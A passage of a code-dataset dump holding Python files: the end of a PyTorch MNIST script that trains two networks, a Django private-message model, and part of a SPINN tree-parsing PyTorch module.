target).item()\n\n # find index of max prob\n pred1 = output1.max(1, keepdim=True)[1]\n pred2 = output2.max(1, keepdim=True)[1]\n correct1 += pred1.eq(target.view_as(pred1)).sum().item()\n correct2 += pred2.eq(target.view_as(pred2)).sum().item()\n\n # print val loss and accuracy\n val_loss1 /= len(val_loader)\n print('\\nVal set: Average loss1: {:.6f}, Accuracy1: {}/{} ({:.2f}%)'\n .format(val_loss1, correct1, len(val_loader.dataset),\n 100. * correct1 / len(val_loader.dataset)))\n val_loss2 /= len(val_loader)\n print('Val set: Average loss2: {:.6f}, Accuracy2: {}/{} ({:.2f}%)\\n'\n .format(val_loss2, correct2, len(val_loader.dataset),\n 100. * correct2 / len(val_loader.dataset)))\n\n # record loss and accuracy\n val_loss_lst.append(val_loss1)\n val_acc_lst.append(correct1 / len(val_loader.dataset))\n return val_loss_lst, val_acc_lst\n\n\ndef test(model1, model2, test_loader, device):\n model1.eval() # Set the module in evaluation mode\n model2.eval()\n test_loss1 = 0\n test_loss2 = 0\n correct1 = 0\n correct2 = 0\n # no need to calculate gradients\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output1 = model1(data)\n output2 = model2(data)\n\n criterion = nn.CrossEntropyLoss()\n test_loss1 += criterion(output1, target).item()\n test_loss2 += criterion(output2, target).item()\n\n # find index of max prob\n pred1 = output1.max(1, keepdim=True)[1]\n pred2 = output2.max(1, keepdim=True)[1]\n correct1 += pred1.eq(target.view_as(pred1)).sum().item()\n correct2 += pred2.eq(target.view_as(pred2)).sum().item()\n\n # print test loss and accuracy\n test_loss1 /= len(test_loader.dataset)\n print('Test set: Average loss1: {:.6f}, Accuracy1: {}/{} ({:.2f}%)'\n .format(test_loss1, correct1, len(test_loader.dataset),\n 100. * correct1 / len(test_loader.dataset)))\n test_loss2 /= len(test_loader.dataset)\n print('Test set: Average loss2: {:.6f}, Accuracy2: {}/{} ({:.2f}%)\\n'\n .format(test_loss2, correct2, len(test_loader.dataset),\n 100. * correct2 / len(test_loader.dataset)))\n\n\nif __name__ == \"__main__\":\n torch.manual_seed(0)\n # create output folder\n now = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime())\n output_path = os.path.join(args.log_dir, args.name + now)\n os.makedirs(output_path)\n\n train_loader, val_loader, test_loader = create_dataloader() # get data loader\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n model1 = MNISTNet().to(device)\n model2 = MNISTNet().to(device)\n # model = resnet18(num_classes=32).to(device)\n\n optimizer1 = optim.SGD(model1.parameters(), lr=args.lr, momentum=0.9)\n optimizer2 = optim.SGD(model2.parameters(), lr=args.lr, momentum=0.9)\n\n train_loss_lst, val_loss_lst = [], []\n train_acc_lst, val_acc_lst = [], []\n\n # main loop(train,val,test)\n for epoch in range(args.epochs):\n train_loss_lst, train_acc_lst = train(model1, model2, train_loader, optimizer1, optimizer2,\n epoch, device, train_loss_lst, train_acc_lst)\n val_loss_lst, val_acc_lst = validate(\n model1, model2, val_loader, device, val_loss_lst, val_acc_lst)\n\n # modify learning rate\n if epoch in [40, 60, 80]:\n args.lr *= 0.1\n optimizer1 = optim.SGD(model1.parameters(), lr=args.lr, momentum=0.9)\n optimizer2 = optim.SGD(model2.parameters(), lr=args.lr, momentum=0.9)\n\n test(model1, model2, test_loader, device)\n\n # plot loss and accuracy curve\n fig = plt.figure('Loss and acc')\n plt.plot(range(args.epochs), train_loss_lst, 'g', label='train loss')\n plt.plot(range(args.epochs), val_loss_lst, 'k', label='val loss')\n plt.plot(range(args.epochs), train_acc_lst, 'r', label='train acc')\n plt.plot(range(args.epochs), val_acc_lst, 'b', label='val acc')\n plt.grid(True)\n plt.xlabel('epoch')\n plt.ylabel('acc-loss')\n plt.legend(loc=\"upper right\")\n plt.savefig(os.path.join(output_path, 'loss_acc.png'))\n plt.show()\n plt.close(fig)\n\n # save model\n torch.save(model1.state_dict(), os.path.join(output_path, args.name + \"_model1.pth\"))\n torch.save(model2.state_dict(), os.path.join(output_path, args.name + \"_model2.pth\"))\n", "sub_path": "decoupling/train_mnist_decoupling.py", "file_name": "train_mnist_decoupling.py", "file_ext": "py", "file_size_in_byte": 9281, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 29, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 29, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 30, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 30, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 31, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 31, "usage_type": "name"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 35, "usage_type": "name"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.utils.data.random_split", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.index_select", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 83, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "torchvision.utils.make_grid", "line_number": 98, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 193, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 195, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 201, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 207, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 208, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 223, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 235, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 235, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 238, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 238, "usage_type": "call"}, {"api_name": "os.path", "line_number": 238, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 243, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 243, "usage_type": "call"}, {"api_name": "os.path", "line_number": 243, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 244, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 244, "usage_type": "call"}, {"api_name": "os.path", "line_number": 244, "usage_type": "attribute"}]} +{"seq_id": "274395734", "text": "import uuid\n\nfrom django.conf import settings\nfrom django.db import models\n\n\nclass MessageManager(models.Manager):\n\n def inbox_for(self, user):\n \"\"\"\n :param user: is the instance of the 'actual' message user model\n :returns: all messages received by the given user and are not\n marked as deleted.\n \"\"\"\n return self.filter(\n recipient=user,\n recipient_deleted_at__isnull=True,\n )\n\n def outbox_for(self, user):\n \"\"\"\n :param user: is the instance of the 'actual' message user model\n :returns: all messages sent by the given user and are not\n marked as deleted.\n \"\"\"\n return self.filter(\n sender=user,\n sender_deleted_at__isnull=True,\n )\n\n def trash_for(self, user):\n \"\"\"\n :param user: is the instance of the 'actual' message user model\n :returns: all messages that were either received or sent by the given\n user and are marked as deleted.\n \"\"\"\n return self.filter(\n recipient=user,\n recipient_deleted_at__isnull=False,\n ) | self.filter(\n sender=user,\n sender_deleted_at__isnull=False,\n )\n\n\nclass Message(models.Model):\n \"\"\"\n A private message from user to user\n \"\"\"\n id = models.UUIDField(default=uuid.uuid4, primary_key=True, editable=False)\n subject = models.CharField(max_length=140)\n body = models.TextField()\n sender = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='sent_messages', on_delete=models.SET_NULL, null=True)\n recipient = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='received_messages', null=True, blank=True, on_delete=models.SET_NULL)\n parent_msg = models.ForeignKey('self', related_name='next_messages', null=True, blank=True, on_delete=models.SET_NULL)\n sent_at = models.DateTimeField(null=True, blank=True)\n read_at = models.DateTimeField(null=True, blank=True)\n replied_at = models.DateTimeField(null=True, blank=True)\n sender_deleted_at = models.DateTimeField(null=True, blank=True)\n recipient_deleted_at = models.DateTimeField(null=True, blank=True)\n\n objects = MessageManager()\n\n def new(self):\n \"\"\"returns whether the recipient has read the message or not\"\"\"\n if self.read_at is not None:\n return False\n return True\n\n def replied(self):\n \"\"\"returns whether the recipient has written a reply to this message\"\"\"\n if self.replied_at is not None:\n return True\n return False\n\n def __str__(self):\n return self.subject\n\n class Meta:\n ordering = ['-sent_at']\n verbose_name = \"Message\"\n verbose_name_plural = \"Messages\"\n", "sub_path": "drf_messages/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 2759, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.db.models.Manager", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 46, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.UUIDField", "line_number": 50, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 50, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.db.models.CharField", "line_number": 51, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 53, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 53, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 54, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 54, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 55, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 55, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 55, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 56, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 56, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 57, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 58, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 58, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 59, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 59, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 60, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "600815973", "text": "import itertools\n\nimport numpy as np\nfrom spinn import util\n\n# PyTorch\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom spinn.util.blocks import BaseSentencePairTrainer, Reduce\nfrom spinn.util.blocks import LSTMState, Embed, MLP, Linear, LSTM\nfrom spinn.util.blocks import reverse_tensor\nfrom spinn.util.blocks import bundle, unbundle, to_cpu, to_gpu, treelstm, lstm\nfrom spinn.util.blocks import get_h, get_c\nfrom spinn.util.misc import Args, Vocab, Example\nfrom spinn.util.blocks import HeKaimingInitializer\n\n\nT_SKIP = 2\nT_SHIFT = 0\nT_REDUCE = 1\n\n\n\"\"\"\n\nMissing Features\n\n- [ ] Optionally use cell when predicting transitions.\n\n\n\"\"\"\n\n\nclass SentencePairTrainer(BaseSentencePairTrainer): pass\n\n\nclass SentenceTrainer(SentencePairTrainer): pass\n\n\nclass Tracker(nn.Module):\n\n def __init__(self, size, tracker_size, lateral_tracking=True):\n super(Tracker, self).__init__()\n\n # Initialize layers.\n self.buf = Linear()(size, 4 * tracker_size, bias=False)\n self.stack1 = Linear()(size, 4 * tracker_size, bias=False)\n self.stack2 = Linear()(size, 4 * tracker_size, bias=False)\n\n if lateral_tracking:\n self.lateral = Linear(initializer=HeKaimingInitializer)(tracker_size, 4 * tracker_size)\n else:\n self.transform = Linear(initializer=HeKaimingInitializer)(4 * tracker_size, tracker_size)\n\n self.lateral_tracking = lateral_tracking\n self.state_size = tracker_size\n\n self.reset_state()\n\n def reset_state(self):\n self.c = self.h = None\n\n def forward(self, top_buf, top_stack_1, top_stack_2):\n tracker_inp = self.buf(top_buf.h)\n tracker_inp += self.stack1(top_stack_1.h)\n tracker_inp += self.stack2(top_stack_2.h)\n\n batch_size = tracker_inp.size(0)\n\n if self.lateral_tracking:\n if self.h is not None:\n tracker_inp += self.lateral(self.h)\n if self.c is None:\n self.c = to_gpu(Variable(torch.from_numpy(\n np.zeros((batch_size, self.state_size),\n dtype=np.float32)),\n volatile=tracker_inp.volatile))\n\n # Run tracking lstm.\n self.c, self.h = lstm(self.c, tracker_inp)\n\n return self.h, self.c\n else:\n outp = self.transform(tracker_inp)\n return outp, None\n\n @property\n def states(self):\n return unbundle((self.c, self.h))\n\n @states.setter\n def states(self, state_iter):\n if state_iter is not None:\n state = bundle(state_iter)\n self.c, self.h = state.c, state.h\n\n\nclass SPINN(nn.Module):\n\n def __init__(self, args, vocab, use_skips=False):\n super(SPINN, self).__init__()\n\n # Optional debug mode.\n self.debug = False\n\n self.transition_weight = args.transition_weight\n self.use_skips = use_skips\n\n # Reduce function for semantic composition.\n self.reduce = Reduce(args.size, args.tracker_size, args.use_tracking_in_composition)\n if args.tracker_size is not None:\n self.tracker = Tracker(args.size, args.tracker_size, args.lateral_tracking)\n if args.transition_weight is not None:\n # TODO: Might be interesting to try a different network here.\n self.transition_net = nn.Linear(args.tracker_size, 3 if use_skips else 2)\n\n # Predict 2 or 3 actions depending on whether SKIPs will be predicted.\n choices = [T_SHIFT, T_REDUCE, T_SKIP] if use_skips else [T_SHIFT, T_REDUCE]\n self.choices = np.array(choices, dtype=np.int32)\n\n def reset_state(self):\n self.memories = []\n\n def forward(self, example, use_internal_parser=False, validate_transitions=True):\n self.buffers_n = (example.tokens.data != 0).long().sum(1).view(-1).tolist()\n\n if self.debug:\n seq_length = example.tokens.size(1)\n assert all(buf_n <= (seq_length + 1) // 2 for buf_n in self.buffers_n), \\\n \"All sentences (including cropped) must be the appropriate length.\"\n\n self.bufs = example.bufs\n\n # Notes on adding zeros to bufs/stacks.\n # - After the buffer is consumed, we need one zero on the buffer\n # used as input to the tracker.\n # - For the first two steps, the stack would be empty, but we add\n # zeros so that the tracker still gets input.\n zeros = to_gpu(Variable(torch.from_numpy(\n np.zeros(self.bufs[0][0].size(), dtype=np.float32)),\n volatile=self.bufs[0][0].volatile))\n\n # Trim unused tokens.\n self.bufs = [[zeros] + b[-b_n:] for b, b_n in zip(self.bufs, self.buffers_n)]\n\n self.stacks = [[zeros, zeros] for buf in self.bufs]\n\n if hasattr(self, 'tracker'):\n self.tracker.reset_state()\n if not hasattr(example, 'transitions'):\n # TODO: Support no transitions. In the meantime, must at least pass dummy transitions.\n raise ValueError('Transitions must be included.')\n self.forward_hook()\n return self.run(example.transitions,\n run_internal_parser=True,\n use_internal_parser=use_internal_parser,\n validate_transitions=validate_transitions)\n\n def forward_hook(self):\n pass\n\n def validate(self, transitions, preds, stacks, bufs, zero_padded=True):\n # Note: There is one zero added to bufs, and two zeros added to stacks.\n # Make sure to adjust for this if using lengths of either.\n buf_adjust = 1 if zero_padded else 0\n stack_adjust = 2 if zero_padded else 0\n\n _transitions = np.array(transitions)\n\n # Fixup predicted skips.\n if len(self.choices) > 2:\n raise NotImplementedError(\"Can only validate actions for 2 choices right now.\")\n\n buf_lens = [len(buf) - buf_adjust for buf in bufs]\n stack_lens = [len(stack) - stack_adjust for stack in stacks]\n\n # Cannot reduce on too small a stack\n must_shift = np.array([length < 2 for length in stack_lens])\n preds[must_shift] = T_SHIFT\n\n # Cannot shift on too small buf\n must_reduce = np.array([length < 1 for length in buf_lens])\n preds[must_reduce] = T_REDUCE\n\n # If the given action is skip, then must skip.\n preds[_transitions == T_SKIP] = T_SKIP\n\n return preds\n\n def predict_actions(self, transition_output, cant_skip):\n transition_dist = F.log_softmax(transition_output)\n transition_dist = transition_dist.data.cpu().numpy()\n transition_preds = transition_dist.argmax(axis=1)\n return transition_preds\n\n def get_statistics(self):\n # TODO: These are not necessarily the most efficient flatten operations...\n\n t_preds = np.array(reduce(lambda x, y: x + y.tolist(),\n [m[\"t_preds\"] for m in self.memories], []))\n t_given = np.array(reduce(lambda x, y: x + y.tolist(),\n [m[\"t_given\"] for m in self.memories], []))\n t_mask = np.array(reduce(lambda x, y: x + y.tolist(),\n [m[\"t_mask\"] for m in self.memories], []))\n t_logits = [m[\"t_logits\"] for m in self.memories]\n if len(t_logits) > 0:\n t_logits = torch.cat(t_logits, 0)\n\n return t_preds, t_logits, t_given, t_mask\n\n def get_transition_preds_per_example(self):\n t_preds, t_logits, t_given, t_mask = self.get_statistics()\n\n batch_size = t_mask.max()\n preds = []\n for batch_idx in range(batch_size):\n preds.append(t_preds[t_mask == batch_idx])\n\n return np.array(preds)\n\n def t_shift(self, buf, stack, tracking, buf_tops, trackings):\n \"\"\"SHIFT: Should dequeue buffer and item to stack.\"\"\"\n buf_tops.append(buf.pop())\n trackings.append(tracking)\n\n def t_reduce(self, buf, stack, tracking, lefts, rights, trackings):\n \"\"\"REDUCE: Should compose top two items of the stack into new item.\"\"\"\n\n # The right-most input will be popped first.\n for reduce_inp in [rights, lefts]:\n if len(stack) > 0:\n reduce_inp.append(stack.pop())\n else:\n if self.debug:\n raise IndexError\n # If we try to Reduce, but there are less than 2 items on the stack,\n # then treat any available item as the right input, and use zeros\n # for any other inputs.\n # NOTE: Only happens on cropped data.\n zeros = to_gpu(Variable(\n torch.from_numpy(np.zeros(buf[0].size(), dtype=np.float32)),\n volatile=buf[0].volatile))\n reduce_inp.append(zeros)\n\n trackings.append(tracking)\n\n def t_skip(self):\n \"\"\"SKIP: Acts as padding and is a noop.\"\"\"\n pass\n\n def shift_phase(self, tops, trackings, stacks, idxs):\n \"\"\"SHIFT: Should dequeue buffer and item to stack.\"\"\"\n if len(stacks) > 0:\n shift_candidates = iter(tops)\n for stack in stacks:\n new_stack_item = next(shift_candidates)\n stack.append(new_stack_item)\n def shift_phase_hook(self, tops, trackings, stacks, idxs):\n pass\n\n def reduce_phase(self, lefts, rights, trackings, stacks):\n if len(stacks) > 0:\n reduced = iter(self.reduce(\n lefts, rights, trackings))\n for stack in stacks:\n new_stack_item = next(reduced)\n stack.append(new_stack_item)\n\n def reduce_phase_hook(self, lefts, rights, trackings, reduce_stacks):\n pass\n\n def loss_phase_hook(self):\n pass\n\n def run(self, inp_transitions, run_internal_parser=False, use_internal_parser=False, validate_transitions=True):\n transition_loss = None\n transition_acc = 0.0\n num_transitions = inp_transitions.shape[1]\n\n # Transition Loop\n # ===============\n\n for t_step in range(num_transitions):\n transitions = inp_transitions[:, t_step]\n transition_arr = list(transitions)\n sub_batch_size = len(transition_arr)\n\n # A mask to select all non-SKIP transitions.\n cant_skip = np.array([t != T_SKIP for t in transitions])\n\n # Remember important details from this time step.\n self.memory = {}\n\n # Run if:\n # A. We have a tracking component and,\n # B. There is at least one transition that will not be skipped.\n if hasattr(self, 'tracker') and (self.use_skips or sum(cant_skip) > 0):\n\n # Prepare tracker input.\n try:\n top_buf = bundle(buf[-1] for buf in self.bufs)\n top_stack_1 = bundle(stack[-1] for stack in self.stacks)\n top_stack_2 = bundle(stack[-2] for stack in self.stacks)\n except:\n # To elaborate on this exception, when cropping examples it is possible\n # that your first 1 or 2 actions is a reduce action. It is unclear if this\n # is a bug in cropping or a bug in how we think about cropping. In the meantime,\n # turn on the truncate batch flag, and set the eval_seq_length very high.\n raise NotImplementedError(\"Warning: You are probably trying to encode examples\"\n \"with cropped transitions. Although, this is a reasonable\"\n \"feature, when predicting/validating transitions, you\"\n \"probably will not get the behavior that you expect. Disable\"\n \"this exception if you dare.\")\n # Uncomment to handle weirdly placed actions like discussed in the above exception.\n # =========\n # zeros = to_gpu(Variable(torch.from_numpy(\n # np.zeros(self.bufs[0][0].size(), dtype=np.float32)),\n # volatile=self.bufs[0][0].volatile))\n # top_buf = bundle(buf[-1] for buf in self.bufs)\n # top_stack_1 = bundle(stack[-1] if len(stack) > 0 else zeros for stack in self.stacks)\n # top_stack_2 = bundle(stack[-2] if len(stack) > 1 else zeros for stack in self.stacks)\n\n # Get hidden output from the tracker. Used to predict transitions.\n tracker_h, tracker_c = self.tracker(top_buf, top_stack_1, top_stack_2)\n\n if hasattr(self, 'transition_net'):\n transition_output = self.transition_net(tracker_h)\n\n if hasattr(self, 'transition_net') and run_internal_parser:\n\n # Predict Actions\n # ===============\n\n t_logits = F.log_softmax(transition_output)\n t_given = transitions\n # TODO: Mask before predicting. This should simplify things and reduce computation.\n # The downside is that in the Action Phase, need to be smarter about which stacks/bufs\n # are selected.\n transition_preds = self.predict_actions(transition_output, cant_skip)\n\n # Constrain to valid actions\n # ==========================\n\n if validate_transitions:\n transition_preds = self.validate(transition_arr, transition_preds, self.stacks, self.bufs)\n\n t_preds = transition_preds\n\n # Indices of examples that have a transition.\n t_mask = np.arange(sub_batch_size)\n\n # Filter to non-SKIP values\n # =========================\n\n if not self.use_skips:\n t_preds = t_preds[cant_skip]\n t_given = t_given[cant_skip]\n t_mask = t_mask[cant_skip]\n\n # Be careful when filtering distributions. These values are used to\n # calculate loss and need to be used in backprop.\n index = (cant_skip * np.arange(cant_skip.shape[0]))[cant_skip]\n index = to_gpu(Variable(torch.from_numpy(index).long(), volatile=t_logits.volatile))\n t_logits = torch.index_select(t_logits, 0, index)\n\n\n # Memories\n # ========\n # Keep track of key values to determine accuracy and loss.\n # (optional) Filter to only non-skipped transitions. When filtering values\n # that will be backpropagated over, be careful that gradient flow isn't broken.\n\n # Actual transition predictions. Used to measure transition accuracy.\n self.memory[\"t_preds\"] = t_preds\n\n # Distribution of transitions use to calculate transition loss.\n self.memory[\"t_logits\"] = t_logits\n\n # Given transitions.\n self.memory[\"t_given\"] = t_given\n\n # Record step index.\n self.memory[\"t_mask\"] = t_mask\n\n # TODO: Write tests to make sure memories look right in the various settings.\n\n # If this FLAG is set, then use the predicted actions rather than the given.\n if use_internal_parser:\n transition_arr = transition_preds.tolist()\n\n # Pre-Action Phase\n # ================\n\n # For SHIFT\n s_stacks, s_tops, s_trackings, s_idxs = [], [], [], []\n\n # For REDUCE\n r_stacks, r_lefts, r_rights, r_trackings, r_idxs = [], [], [], [], []\n\n batch = zip(transition_arr, self.bufs, self.stacks,\n self.tracker.states if hasattr(self, 'tracker') and self.tracker.h is not None\n else itertools.repeat(None))\n\n for batch_idx, (transition, buf, stack, tracking) in enumerate(batch):\n if transition == T_SHIFT: # shift\n self.t_shift(buf, stack, tracking, s_tops, s_trackings)\n s_idxs.append(batch_idx)\n s_stacks.append(stack)\n elif transition == T_REDUCE: # reduce\n self.t_reduce(buf, stack, tracking, r_lefts, r_rights, r_trackings)\n r_stacks.append(stack)\n r_idxs.append(batch_idx)\n elif transition == T_SKIP: # skip\n self.t_skip()\n\n # Action Phase\n # ============\n\n self.shift_phase(s_tops, s_trackings, s_stacks, s_idxs)\n self.shift_phase_hook(s_tops, s_trackings, s_stacks, s_idxs)\n self.reduce_phase(r_lefts, r_rights, r_trackings, r_stacks)\n self.reduce_phase_hook(r_lefts, r_rights, r_trackings, r_stacks, r_idxs=r_idxs)\n\n # Memory Phase\n # ============\n\n self.memories.append(self.memory)\n\n # Loss Phase\n # ==========\n\n if hasattr(self, 'tracker') and hasattr(self, 'transition_net'):\n t_preds, t_logits, t_given, _ = self.get_statistics()\n\n # We compute accuracy and loss after all transitions have complete,\n # since examples can have different lengths when not using skips.\n transition_acc = (t_preds == t_given).sum() / float(t_preds.shape[0])\n transition_loss = nn.NLLLoss()(t_logits, to_gpu(Variable(\n torch.from_numpy(t_given), volatile=t_logits.volatile)))\n transition_loss *= self.transition_weight\n\n self.loss_phase_hook()\n\n if self.debug:\n assert all(len(stack) == 3 for stack in self.stacks), \\\n \"Stacks should be fully reduced and have 3 elements: \" \\\n \"two zeros and the sentence encoding.\"\n assert all(len(buf) == 1 for buf in self.bufs), \\\n \"Stacks should be fully shifted and have 1 zero.\"\n\n return [stack[-1] for stack in self.stacks], transition_acc, transition_loss\n\n\nclass BaseModel(nn.Module):\n\n optimize_transition_loss = True\n\n def __init__(self, model_dim=None,\n word_embedding_dim=None,\n vocab_size=None,\n initial_embeddings=None,\n num_classes=None,\n mlp_dim=None,\n embedding_keep_rate=None,\n classifier_keep_rate=None,\n tracking_lstm_hidden_dim=4,\n transition_weight=None,\n encode_style=None,\n encode_reverse=None,\n encode_bidirectional=None,\n encode_num_layers=None,\n use_skips=False,\n lateral_tracking=None,\n use_tracking_in_composition=None,\n use_sentence_pair=False,\n use_difference_feature=False,\n use_product_feature=False,\n num_mlp_layers=None,\n mlp_bn=None,\n use_projection=None,\n **kwargs\n ):\n super(BaseModel, self).__init__()\n\n self.use_sentence_pair = use_sentence_pair\n self.use_difference_feature = use_difference_feature\n self.use_product_feature = use_product_feature\n self.hidden_dim = hidden_dim = model_dim / 2\n\n args = Args()\n args.lateral_tracking = lateral_tracking\n args.use_tracking_in_composition = use_tracking_in_composition\n args.size = model_dim/2\n 